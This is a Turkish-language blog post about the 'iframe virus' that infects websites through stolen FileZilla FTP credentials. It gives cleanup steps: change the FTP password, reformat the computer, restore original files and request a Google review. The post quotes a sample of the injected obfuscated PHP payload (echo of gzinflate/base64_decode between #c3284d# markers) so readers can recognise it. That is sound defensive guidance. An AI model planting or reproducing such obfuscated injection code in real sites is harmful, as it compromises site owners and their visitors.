İframe virüsü nedir?
İframe virüsü sitenize Filezilla, CuteFTP vs. gibi programlar sayesin de genelde index.html-php, header.php, .httaccess dosyalarına bir kod ekler.
Örnek;
#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQk AihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgw AbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIc xkiig9b8JAqU4CRPl+qj9hynS4aZkbT2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNci tRaTiRlos5Re45vUsSM7xlFfAMMTp9xnfLSRY33eNRsBPYkpwu tswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvah QZ5u5nLY0BH6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfd YFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUe s5lRL+6rv6dCyCQ9e8BjBYVeoJUPMarENEFg+LahGmkCxOxfM6 Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#İframe virüsü filezilla gibi programlar dan giriş yaptığınız da ftp şifresini kendi kaydeder ve şifrenizi değiştirmediğiniz takdirde siz ne kadar silseniz de ftp şifrenizi kayıt ettiği için temizlemeniz neredeyse imkansızdır ve siteniz bir süre sonra Chrome, Firefox gibi web tarayıcıların da sakıncalı site olarak karşınıza çıkar. Benim bir kaç kez başıma geldiği için bu sorunu bir kaç şekilde çözdüm.
İframe kodu temizleme yöntemleri:
-İlk olarak sitenize girdiğiniz zaman bildiğiniz bir süreden sonra siteniz açılıyor ise sol alt tarafta bir siteye yönlendirme mevcuttur bunun linkini göreceksiniz.
eğer eklemediğiniz bir sitenin yüklenmesi varsa bu demek oluyor ki iframe virüsü sitenize yeni bulaşmış, direk ftp şifrenizi değiştirip kodu sitenizden silerseniz bundan kurutulabilirsiniz. Kodun nerelere bulaştığını yukarda belirtmiştik.
-Sitenizden kodları sildiniz fakat sildiğiniz takdir de sürekli kod sitenize bulaşıyor ise yapmanız gereken kesin çözüm;
1-Bilgisayarınıza format atmanız gerekiyor.
Bunun nedeni artık virüsün direk olarak bilgisayarınız da yer alması, siz her ne kadar ftp şifrenizi de değiştirseniz, kodları siteden de silseniz kod sürekli olarak sitenize bulaşacaktır.
2.Format attıktan hemen sonra Filezilla gibi programlar yüklemeden önce FTP şifrenizi değiştirmeniz gerekiyor.
3.Bunları yaptıktan sonra eğer elinizde sitenizin orjinal kodları varsa sitedekilerle değiştirmeniz, eğer yok ise belirttiğim dosyalar daki kodları sitenizden silmeniz.
4.Tüm bunları yaptınız fakat siteniz hala sakıncalı site olarak gözüküyor, sitenizi google webmaster tools' dan ekliyorsunuz ve sitenizin tekrar incelenmesini talep ediyorsunuz. Maksimum 2 hafta diye söyleniyor fakat, en geç 3 gün içinde gerekli değişiklik yapılıyor.
DipNot:İnternetten indirdiğiniz dosyaları virüs taramasından geçirmeyi ihmal etmeyin.